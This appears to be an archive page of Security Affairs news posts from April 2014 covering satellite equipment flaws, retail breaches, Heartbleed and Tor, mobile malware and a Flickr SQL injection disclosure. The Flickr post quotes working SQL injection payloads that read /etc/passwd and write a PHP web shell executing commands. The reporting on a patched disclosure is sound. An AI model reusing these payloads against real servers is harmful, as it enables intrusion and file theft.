Skip to content
Apr 19 14

Satellite equipment affected by severe vulnerabilities

by paganinip
Satellite

A study conducted by experts at IOActive uncovered a variety of severe vulnerabilities in Satellite equipment widely used in numerous industries.

Satellite Communication Devices are vulnerable to cyber attacks due the presence of critical design flaws in the firmware of principal satellite terrestrial equipment. Different satellite systems manufactured by some of the world’s biggest government contractors are affected by severe vulnerabilities according Security experts at IOActive. The researchers have uncovered numerous vulnerabilities in software and ground-based satellite systems manufactured by British suppliers Cobham and Inmarsat. Hackers can hijack and disrupt communication links used in various industries including defense, aviation and communications with serious consequences for the population.

IOActive found that malicious actors could abuse all of the devices within the scope of this study. The vulnerabilities included what would appear to be backdoors, hardcoded credentials, undocumented and/or insecure protocols, and weak encryption algorithms. In addition to design flaws, IOActive also uncovered a number of features in the devices that clearly pose security risks. ” states the report from IOActive.

Products commercialized by different manufactures, including Iridium, Harris Corporation, Hughes, Thuraya and Japan Radio Company, are also flawed according a study conducted by researchers.

The vulnerable satellites equipments discovered by researchers at IOActive are Harris’ RF-7800-VU024 and RF-7800-DU024 terminals for Broadband Global Area Network (BGAN) services; Hughes 9201/9202/9450/9502 for BGAN and BGAN M2M services, Thuraya IP for BGAN services, Cobham Explorer and SAILOR 900 VSAT for VSAT services, Cobham AVIATOR 700 (E/D) for SwiftBroadband Classic Aero services, Cobham SAILOR FB 150/250/500 for Inmarsat FB services, Cobham SAILOR 6000 Series for Inmarsat C services, JRC JUE-250/500 FB for Inmarsat FB services, and Iridium Pilot/OpenPort for Iridium services.

Satellite components flawed

“You could attack one of these devices with SMS, and trigger features to install new firmware or to compromise it,” “Attackers who compromise the database of an Inmarsat SIM/Terminals reseller can use this information to remotely compromise all those terminals,” says Ruben Santamarta, principal security consultant for IOActive.

As explained by Santamarta, just an SMS text message could become a bullet in the hand of a cyber criminals, the researchers uncovered wrong design habit in the firmware of the device, hardcoded credentials, implementation of insecure protocols, presence of backdoors, and adoption of weak password reset processes are some sample of the flawed processed identified on the equipment.

In my opinion the most alarming fact is that despite the researcher has reported the findings to the CERT Coordination Center, which promptly issued an alert to the vendors in January, but to date the reply is faint. Within the plethora of vendors, only Iridium has started to work for the development of the patches.

“In most cases, attackers can completely compromise” “They could run their own code, install malicious firmware… and do anything they want with that device.” “They can spoof messages and trick the ship to follow a certain path, or to rescue another ship. They can disrupt communications… if a vessel can’t send a distress signal, that’s the worst scenario, if a ship can’t communicate.” the system, Santamarta says.

The same would be true for an airplane, he says. And an attacker would not even need physical access to the satellite equipment to pull off a link hijack or spoof; in many cases, hackers could execute their attacks remotely.

The researchers were able to discover various vulnerabilities simply reverse engineering the firmware of the satellite appliances, once discevered the flaws the unique problem for the attackers is to gain access to the systems through the Internet or any other kind of interface.

 “I wasn’t looking for memory or buffer overflow or other typical vulnerabilities. But design flaws [found] like backdoors or [weak] protocols are in a way more dangerous because you can reach the device” by using them.

 “But if you can reach the device, you can compromise it. You can access it through HTTP or some other kind of documented interfaces. In most cases, you can remotely exploit these flaws.”

The report issued by IOActive provides also some recommendations for users of these satellite equipment inviting to seriously consider the possibilities that attackers exploit these vulnerabilities.

“Owners and providers should evaluate the network exposure of these devices, implement secure policies, enforce network segmentation, and apply restrictive traffic flow templates (TFT) when possible. Until patches are available, vendors should provide official workarounds in addition to recommended configurations in order to minimize the risk these vulnerabilities pose.”

The researchers at IOActive also recommend that SATCOM manufacturers and resellers immediately remove all publicly accessible copies of device firmware updates from their websites to avoid reverse engineering of the source code. 

“If one of these affected devices can be compromised, the entire SATCOM infrastructure could be at risk. Ships, aircraft, military personnel, emergency services, media services, and industrial facilities (oil rigs, gas pipelines, water treatment plants, wind turbines, substations, etc.) could all be impacted by these vulnerabilities.
The results of IOActive’s research should be a wake-up call for both the vendors and  users of the current generation of SATCOM technology.” is the statement used to closes the report.

Pierluigi Paganini

(Security Affairs –  Satellite equipment, cyber security)

Apr 18 14

US retailer Michaels Stores confirms card data breach

by paganinip
Michaels Stores 2

After Target and Neiman Marcus, also US retailer Michaels Stores confirms card data breach occurred early this year, the second one in the company hystory.

Early this year was spread the news that Michaels Stores Inc, the biggest U.S. arts and crafts retailer, was the victim of a severe data breach.

Michaels Stores Inc. retailer was the last victim of a series of massive data breach, a few weeks after the hack of US retailers Target and Neiman Marcus. Michaels Stores Inc has more than 1,250 stores across the United States, in January Fraud experts have detected a pattern of illicit activities on a set of cards all recently used at the store of the company.

This week the Michaels Stores Inc. confirmed the presence of a flaw at certain payment systems at its U.S. stores and that of its unit, Aaron Brothers, as reported by the Reuters news agency.

According first revelations made by Michaels Stores representatives the data breach occurred between May 8, 2013 and January 27, 2014. Its impact is considerable severe, it has been estimated that data about 2.6 million cards was stolen, about 7 percent of payment cards used by its customers at the US stores.

Michaels Stores

Michaels Stores Inc. also confirmed the potential exposure of data related to 400,000 cards at its Aaron Brothers unit in the period between June 26, 2013 and February 27, 2014.

“There was no evidence that data such as customers’ name or personal identification number were at risk, Michaels Stores said in a statement.”

The systems at Michaels Stores were infected with malware designed to steal payment information, thanks the support of a cyber security firm the malicious code was identified and removed from the machines.

The US retailers are planning to form an industry group to share information on incidents and establish a surveillance center for fraud prevention. The number of cyber threats targeting retailers are even more complex and difficult to identify, security firms are suggesting a layered approach to promptly identify patterns related to ongoing cyber attacks.

Pierluigi Paganini

(Security Affairs –  Michaels Stores, data breach)

Apr 18 14

Ponemon study – SQL Injection attacks too dangerous for organizations

by paganinip
The SQL Injection Threat Study logo

A new study conducted by the Ponemon Institute reveals the impact of successfully SQL injection attacks on organizations during the last year.

The Ponemon Institute published a new study titled “The SQL Injection Threat Study“ to understand the reply of organizations to the SQL injection threat.

The study is sponsored by DB Networks, its Chairman and CEO Brett Helm used the following words to describe the inpact of the SQL injection attacks:

“It’s well known that SQL injection attacks are rampant and have proven to be devastating to organization of all sizes. This study delves into both the scope and many of the root causes of SQL injection breaches,“

The analysis reveals that 65% of organizations suffered successfully SQL injection attacks in the last twelve months which were able to evade victims’ defenses.

“We believe this is the first study to survey the risks and remedies regarding SQL injection attacks, and the results are very revealing,“ “It is commonly accepted that organizations believe they struggle with SQL injection vulnerabilities, and almost half of the respondents said the SQL injection threat facing their organization is very significant, but this study examines much deeper issues.” commented Dr. Larry Ponemon. 

The worrying news is that despite about one-third of believe that their organization has the necessary technology to detect and mitigate the cyber threats, the success rate of SQL injection attacks is too high.

The SQL Injection attacks Threat Study

The SQL Injection attacks Threat Study 2

According the Ponemon The SQL Injection Threat Study, 52% of respondents reported to have adopted third-party software to detect the attack but that they haven’t tested it.

49 percent of the respondents revealed that the SQL injection threat represents a serious problem for their company, SQL injection is considered one of the primary caused of data breach.

Cybercrime is adopting techniques even more sophisticated but too many organizations are not aware of principal attack patterns and this consideration makes them more exposed to the cyber attacks.

“Less than half of respondents (46 percent) are familiar with the term Web Application Firewalls (WAF) bypass. Only 39 percent of respondents are very familiar or familiar with the techniques cyber criminal use to get around WAF perimeter security devices.” states the report.

The impact of SQL injection attacks on the organization is very serious, the threat is very insidious and it is hard to detect, breaches required in fact an average of nearly 140 days to discover with an additional 68 days on average needed to remediate.

Reportes highlights are:

  • 65% of respondents had experienced SQL injection attacks that successfully evaded their perimeter defenses in the past 12 months
  • SQL injection breaches required an average of nearly 140 days to discover with an additional 68 days on average needed to remediates
  • Nearly half of respondents (46%) were familiar with the term “WAF Bypass”
  • 88% of respondents had a favorable or very favorable opinion of the use of behavioral analysis technology for detecting SQL injection attacks
  • 44% utilize professional penetration testers to identify vulnerabilities in their IT systems; but only a third (35%) of those penetration tests were allowed to actually test for SQL injection vulnerabilities

Pierluigi Paganini

(Security Affairs –  Ponemon Institute, SQL injection)

Apr 18 14

The impact of the HeartBleed Bug on Tor Anonymity

by paganinip
tor heartbleed bug thumbnail

The presence of nearly 380 servers in the Tor Network, 12 percent of the exit capacity, running the vulnerable version of OpenSSL could have compromised user’s anonymity.

The Heartbleed bug is the flaw in the popular OpenSSL library that is scaring the security communities, many security experts hiphotesized that Intelligence agencies, including NSA, have exploited the bug to spy on protected communications and to steal sensitive information from affected systems. No doubts, the Heartbleed bug has a significant impact on server infrastructure and also on mobile industry, but what it its impact on Tor network?
The Heartbleed bug has a serious impact also on the online anonymity of Tor users, to better understand how it is possible, we must take in mind that in order to preserve the user’s experience online is made untraceable distributing the connections on unpredictable channels through a network of nodes.
Heartbleed bug tor 3
When a user accesses any resource on the visible web through Tor network, his IP address is masqueraded, the connection appears as originating from a Tor exit relay.
Heartbleed bug tor 2
A Tor Relay receives traffic on the Tor network and pass it along, particular Tor Relay are the Exit nodes, an exit relay in fact is the final relay that Tor traffic passes through before it reaches its destination.
The Tor anonymity could be compromised if an attacker is able to grab encrypted information from the nodes and it it possible is they run a version of OpenSSL library affected by Heartbleed bug.
To avoid the exploitation of the Heartbleed bug on the affected nodes, and consequent disclosure of sensitive information, Tor Project leader Roger Dingledine, has identified and rejected 380 vulnerable exit nodes suggesting that the exit nodes running the vulnerable versions of OpenSSL should be blacklisted from the network. Roger invited to include again the node in the network only after that they will be upgraded.
If the other directory authority operators follow suit, we’ll lose about 12% of the exit capacity and 12% of the guard capacity,” he writes on the software’s mailing list.
The impact is critical, 380 nodes represent nearly 12 percent of the exit capacity, the Heartbleed bug could be exploited to compromise a vulnerable exit node and capture traffic data related to users anonymous connections.
I thought for a while about trying to keep my list of fingerprints up-to-date (i.e. removing the !reject line once they’ve upgraded their openssl), but on the other hand, if they were still vulnerable as of yesterday, I really don’t want this identity key on the Tor network even after they’ve upgraded their OpenSSL,” Dingledine wrote.
Anyone who had abilities to exploit the HeartBleed bug in the past months, has probably broken the cloak of anonymity which lie Tor users.

Pierluigi Paganini

(Security Affairs –  Tor, HeartBleed Bug)

Apr 17 14

Cyber warriors fought between the government and the security industry

by paganinip
cyber security

The demand for cyber security experts continues to raise, the US Government announced further investment to recruit new cyber talents with many difficulties.

Cyber security is officially one of the first targets of every government, many countries announced huge investments to improve their cyber capabilities, a great effort that is having a significant impact on budgets and politics.

The Military Cyber Spending reserved by the Pentagon for cyber operations next year is $5 Billion, part of the comprehensive $496 billion fiscal 2015 budget, the U.S. Secretary of Defense Chuck Hagel recently announced that US Army plans to triple its cybersecurity staff by 2016.

“A fund spending within the $5.1 billion Military Cyber Spending will be reserved for cyber operations to go toward the continued development of 133 special cyber mission teams. A critical goal, of course, is the improvement on defense for critical infrastructure against internet-based attacks, The Pentagon has estimated that the number of cyber mission team staffers in place by 2016 will reach 6,000 units, including 13 national mission teams with eight national support teams.” I’ve written in a previous article.

Not only Information Warfare, one of the primary goal is the fight to the cybercrime, FBI Supervisory Special Agent Charles Gilgen announced that his agency’s cyber division plans to hire 1,000 agents and 1,000 analysts in the coming twelve months.

The overall number of cyber experts that will be recruited in the next two years is 6,000 people, and to mitigate the shortage of experts the government is also trying to sustain training programs starting from the universities.  A Government program started in 2000, codenamed CyberCorps, promotes a series of activities to develop cyber security capabilities within the schools.

Participants must be US citizens and could receive a cash stipend up to $30,000 a year, “depending on whether the student is pursuing a bachelor’s, a master’s, or a doctorate“, once completed their studies the youngsters serve in Government for the same length of time as they received funding.

cyber security 1

Despite all these initiatives, the  US Government has to face with another serious problem, the migration of highest cyber skills from government agencies to private industries, the talents are of course attracted by higher earnings in the private sector.

“If you couldn’t break $100,000 as a starting salary, I think you’d have trouble attracting those guys,” said Golden Richard, a professor with the University of New Orleans Information Assurance Program.

The young cyber experts prepared thanks to government programs are immediately recruited by private industry that is willing to spend that much more enticing figures for specific knowledge in cyber security.

The cyber shortage is also responsible for massive recruitment of contractors in the cyber security sector and Intelligence, but the downside is the increased risks related to the possible disclosure of sensitive or classified material. The Snowden‘s case has shocked the world Snowden, seriously injuring the U.S. Intelligence structure, its impact has led and will lead to a revolution in US Intelligence.

Snowden‘s revelations are the causes of a dangerous disaffection in a machine responsible for the Homeland Security, many students have argued their grip away from their training programs citing the case of the popular whistleblower.

Get ready, probably the cyber security landscape is set to change profoundly in the next two years and opportunity for all the professionals like me that “live for security”.

Pierluigi Paganini

(Security Affairs –  Security,  Intelligence)

Apr 17 14

New iBanking mobile Trojan exploits Facebook platform

by paganinip
facebook iBanking

Security experts at ESET detected a new variant of iBanking Trojan offered in the underground that exploits Facebook platform as vector of infection.

iBanking is the name of a mobile banking Trojan app distributed through HTML injection attacks on banking sites. iBanking deceives victims impersonating itself as a  ‘Security App‘ for Android, we have spoken about it  early 2014 when the source code of the mobile malware has been leaked online through an underground forum.

iBanking facebook security app

iBanking mobile banking Trojan is available for sale in the underground for $5,000 according the RSA’s FraudAction Group, the malware is used to avoid the security mechanisms implemented by the banking websites, including two-factor authentication.

iBanking could be commanded via SMS or over HTTP beaconing C&C server every pre-defined interval, then pull and execute the command if one is awaiting it. The bot implements the following features:

  • Capture all incoming/outgoing SMS messages
  • Redirect all incoming voice calls to a different pre-defined number
  • In/out/missed call-list capturing
  • Audio capturing via device’s microphone
  • Phone book capturing
  • URL status: the mobile device will visit a provided URL, returning its status (possibly for click-fraud schemes.)
Experts at ESET security firm discovered a new variant of iBanking trojan which is exploiting Facebook as vector of infection. 
According a report issued by ESET security researchers, the new version of iBanking, aka Android/Spy.Agent.AF, is targeting Facebook users by tricking them to download a malware application.
The new variant iBanking Trojan implements a webinject that was totally new for security experts, in fact, it uses JavaScript to inject content into Facebook web pages, in particular to create a fake Facebook Verification page for Facebook users. Once the victim logs into his Facebook account, iBanking  tries to inject the following content into the webpage:
iBanking facebook malware

The above verification page that was designed to request victims, their mobile number in order to verify the Facebook account authenticity.  In case the SMS fails to reach the user’s mobile, one of the successive pages was designed to request victim to download an Android app from an URL displayed or reading a QR code proposed on the screen,.

Once downloaded iBanking, the bot start its activities, it connects to the C&C server to receive commands.
iBanking, or any other similar malware, represents a privileged choice for cyber criminals due its ability to bypass two-factor authentication, criminal underground is increasing its offer especially oriented to mobile solutions. iBanking is considered a sophisticated solution according experts at ESET which compared it to other banking trojan like Perkele
iBanking, detected by ESET as Android/Spy.Agent.AF, is an application that showcases complex features when compared with other earlier mobile banking malware, such as Perkele. It can be used in conjunction with any malware able to inject code into a webpage and is generally used to redirect incoming SMS messages to bypass two-factor authentication.” reported ESET.
Another alarming hypothesis is this Facebook iBanking app might be distributed by other banking malware in the next months, cybercriminals could start to adopt mobile components to attack other popular web services that enforce strong authentication.
The “commoditization” of malicious code and the code source leaks will sustain an offer that will increase in complexity and efficiency.
Stay sharp!

Pierluigi Paganini

(Security Affairs –  iBanking, malware)

Apr 16 14

Intelligence could exploit Whatsapp bug to track users location

by paganinip
whatsapp-share-location-how-to

A group of researchers discovered a vulnerability in WhatsApp “Location Share” feature which exposes user’s location to the attackers.

Security issues related to WhatsApp application are not a novelty, so popular application are continuously targeted by hackers and security experts that search for vulnerabilities to exploit. Early 2014 experts at Praetorian have been conducting the Project Neptune to assess the security for designing and maintenance of mobile apps, including WhatsApp.

The researchers  discovered different security issues in the way WhatApp implements SSL, the principal one is the lack of enforcing the “certificate pinning“ which exposed users to the risk of man-in-the-middle attacks, but the company after different alert fixed the flaws.

A last bug discovered in WhatsApp app exposes user’s location to attackers, in particular under analysis there is the WhatsApp “Location Share” feature.

According to Researchers at UNH Cyber Forensics Research & Education Group, the location sharing feature implemented by WhatsApp  could expose user’s location to attackers and Intelligence Agencies.

As illustrated by colleagues at The Hacker News in order to share their location on WhatsApp, users need to first locate themselves on Google Map within the app window.

WhatsApp location hacking

Once the user has selected the position, WhatsApp fetches it and takes an image from the Google Map service, the thumbnail is then shared as the message icon. In this phase the user’s location is exposed because WhatsApp downloads the image through an unencrypted channel from Google allowing an attacker to capture it with a Man-in-the-middle attack.

Below the video Proof of Concept:

We were not able to intercept the image until the message was sent from the phone, indicating that the download of the image did not occur until the message was actually sent.” researcher said.

In order to perform the MITM attack, the bad actor must be in the same network, this means the attacker must be around its victim, probably already knowing his location but if an attacker is able to conduct a MITM attack on a large scale, the scenario changes.

 “such short-range dependency makes this vulnerability of very low severity level for normal attackers, but spy agencies like NSA or GCHQ, those are capable to perform large scale MITM attacks, could exploit this flaw to trace users’ locationnation-wide.” explained in a comment by Mohit Kumar.

The researchers have promptly reported the vulnerability to WhatsApp which has fixed it in the latest beta version available on company official website, soon the fix will be deployed also for the official release.

Waiting for the fix, it is suggested to avoid sharing location using WhatsApp when connected to an un-trusted network.

Pierluigi Paganini

(Security Affairs –  WhatsApp, mobile)

Apr 16 14

Samsung Galaxy S5 fingerprint sensor hacked

by paganinip
samsung galaxy s5

SRLabs researchers have published a video POC on YouTube to demonstrate how it is easy to bypass the fingerprint sensor on Samsung Galaxy S5.

SRLabs researchers have published a video Proof of Concept on YouTube to demonstrate that they were able to bypass the fingerprint authentication mechanism implemented by Samsung Galaxy S5. The researchers demonstrated to gain unauthorized access just by using a lifted fingerprint with wood-glue based dummy finger. Remind you of anything?

Principal mobile manufacturers tried to improve user’s security adding biometric authentication system based for example on Fingerprint feature. Months ago Apple proposed its Apple TouchID system that was easily hacked and today’s security experts have found a way to bypass also the Samsung Galaxy S5 Fingerprint feature. The feature implemented in the Samsung Galaxy S5 was also used to facilitate payments through PayPal and theoretically also to make it more secure.

samsung galaxy s5 fingerprint

Samsung Galaxy S5 also implemented a smart feature to allow users to easily transfer money via PayPal circuit just by swiping a finger on the fingerprint sensor, but considering the attack presented by the teamSRLabs  could allow bad actors to access to victim’s PayPal account without providing any secret password. A few days after the official commercial launch of the Samsung Galaxy S5 security experts have successfully hacked Fingerprint sensor with a method quite similar to the one adopted to deceive the Touch ID sensor proposed by Apple.

SRLabs researchers exploited the poor security implementation in the handset fingerprint scanner,  the Samsung Galaxy S5 fingerprint scanner in fact allows multiple incorrect attempts without requiring a password, this means that a bad actor could potentially make an infinite number of tries until the correct match.

Another concerning issue related to the hack presented by the researchers is that after mobile restart the Samsung Galaxy S5 doesn’t require user to enter a passcode before he can use his fingerprint to unlock the Smartphone, this means that in case of theft attackers could have complete access to the device. Despite attackers need to have physical access to the Samsung Galaxy S5 to exploit the vulnerability, it is clear that Fingerprint feature implemented by the giant lack of a proper security design.  I’m sure Samsung will promptly fix it.

Pierluigi Paganini

(Security Affairs –  Samsung Galaxy S5, mobile)

Apr 16 14

German Aerospace Center hit by serious malware-based attack

by paganinip
German Aerospace Center

The German Aerospace Center was victim of a cyberespionage attack, many computers have been infected by sophisticated Trojans and other spyware.

Cyber espionage is considerable today one of the most alarming cyber threats for governments and private industries, a growing number of attacks has the primary purpose to steal sensitive information like secret documents and intellectual property.

Recently the US Government has raised the alert level of the cyber threat in consideration of the numerous attacks observed during the last twelve months.

The news of the day is related to a new significant malware-based attack against the German Aerospace Centre (DLR – Deutsches Zentrum für Luft- und Raumfahrt e. V.).

German Aerospace Center 2

The disturbing news was reported by German Agency Der Spiegel during the weekend, the German Aerospace Centre was hit by an attack conducted by foreign state-sponsored hackers.

The German Aerospace Centre is located in Cologne and in its building are conducted research activities for the development of technologies for defense, communications, air safety or the environment:

The media agency reported the cyber attack as a “coordinated and systematic” offensive probably conducted by a foreign intelligence agency. 

Several computers within the  German Aerospace Centre have been infected by Trojans and other spyware used to gather sensitive information.

“As was now known, the DLR fights for months against the alleged assault of a foreign intelligence service: According to research by SPIEGEL DLR turned on the National Cyber ​​Defence Centre in Bonn, after several computers of researchers and system administrators with espionage had been infiltrated programs.” reported Der Spiegel.

The operation appears as a long term cyber espionage program and as usually happen in these cases the first suspect is China, the most persistent collector of information. The first results produced by the investigation refer of Chinese characters present in the source code of the malware used.

“IT forensic experts of the Federal Office for Security in Information Technology (BSI) discovered in the code of some Trojan Chinese characters and recurring typos that suggest attacker from the Far East.”

“But it could also be a simple camouflage,” says an insider, an attack from the West, such as the U.S. Secret NSA may not be completely ruled out. The federal government classifies the case as extremely serious because it aims, among other things, armor and missile technology”. reports the newspaper. 

The attack on German Aerospace Center (DLR) appears very sophisticated, the forensic investigators who have analyzed the infected systems were not able to detect the malware used in the attacks, the Trojans which compromised the targets were designed to self-destruct as soon as they discovered.The report refers that the malicious agents were able to remain hidden for a long time infecting all operating systems used at the German Aerospace Center

The investigation is still ongoing, the German authorities consider the cyber attack an alarming event, the demonstration that foreign Intelligence agencies are very interested to gather sensitive information and secret projects based on advanced researches.

Pierluigi Paganini

(Security Affairs –  German Aerospace Center, cyber espionage)

Apr 15 14

Flickr affected by critical SQL Injection and Remote Code Execution bugs

by paganinip
Flickr

The security expert Ibrahim Raafat discovered critical SQL injection vulnerabilities in Flickr Photo Books which allow attackers to gain complete control of the server and its database.

The giant of online photo management and sharing Flickr, a Yahoo-owned company, was affected by critical vulnerabilities which allow attackers to gain access to the webserver website database.

The alarming discovery was announced by the Egyptian security expert Ibrahim Raafat which has found a critical SQL injection vulnerability in Flickr Photo Books, the feature implemented by Flickr for printing custom photo books through the image hosting website.

The service Flickr Photo Books was recently launched, nearly 5 months ago, Raafat has discovered that manipulating some parameters he was able to conduct an SQL injection on the website.  Acting on the two parameters:

  • (page_id , items)
  •  items

Raafat was able to conduct a Blind SQL injection meanwhile one  through the modification of the parameter order_id he was able to conduct a Direct SQL Injection that provided the researcher a full access to the Flickr database.

Raafat started to analyze the HTTP headers for all the requests sent to the platform and started checking every single parameter, when he has found Direct SQL injection in order_id parameter POST

order_id=116564954&first_name=aaaa&last_name=sssss&street1=ddddddddddd&street2=ddddddd&city=fffffff&state=ff&postal_code=12547&country_code=US&phone=45454545457&method=flickr.products.orders.setShippingAddress&csrf=1365645560%3Acmj2m0s5jvyrpb9%kld65d65d54d54d55d45dsq&api_key=3c7ab2846f4183ecg56s96d5d5w4e644268&format=json&hermes=1&hermesClient=1&reqId=q3oovqa&nojsoncallback=1
Once accessed to the DB, the hacker has different options like make a DB dump and steal MYSQL administrator password.
Flickr SLQ Injection

But as remarked by the researcher the SQL injection vulnerability could be exploited by attackers also for remote code execution on the Flickr server, he succeeded to read some server files (e.g. such as /etc/passwd and some log files) by using LOAD_FILE function

order_id=-116564954 union
select load_file(“/etc/passwd“),2,3,4,5,6,7,8,9,10,11,12,13,14,15– -

To complete his hack Raafat has also written new files on the server file system, in this way combining the use of load_file function it was able to write and execute any kind of script directly on the server, allowing an attacker to upload a a code execution shell.

order_id=-116564954 union select “@RaafatSEC“,2,3,4,5,6,7,8,9,10,11,12,13,14,15 INTO OUTFILE “/tmp/raafat“– -
I tested reading it via load_file, it worked, Check the video
Changing the text and file path to my code
order_id=-116564954 union select “<?php $cmd = $_GET['raafat']; echo sy stem ($cmd); ?>“,2,3,4,5,6,7,8,9,10,11,12,13,14,15 INTO OUTFILE “/home/$path/rce.php“– -
/rce.php?raafat=ls -la

Following the Video POC published by the security expert:

Yahoo has immediately patched the flaws after the researcher reported it to Yahoo.

Pierluigi Paganini

(Security Affairs –  Flickr, SQL Injection)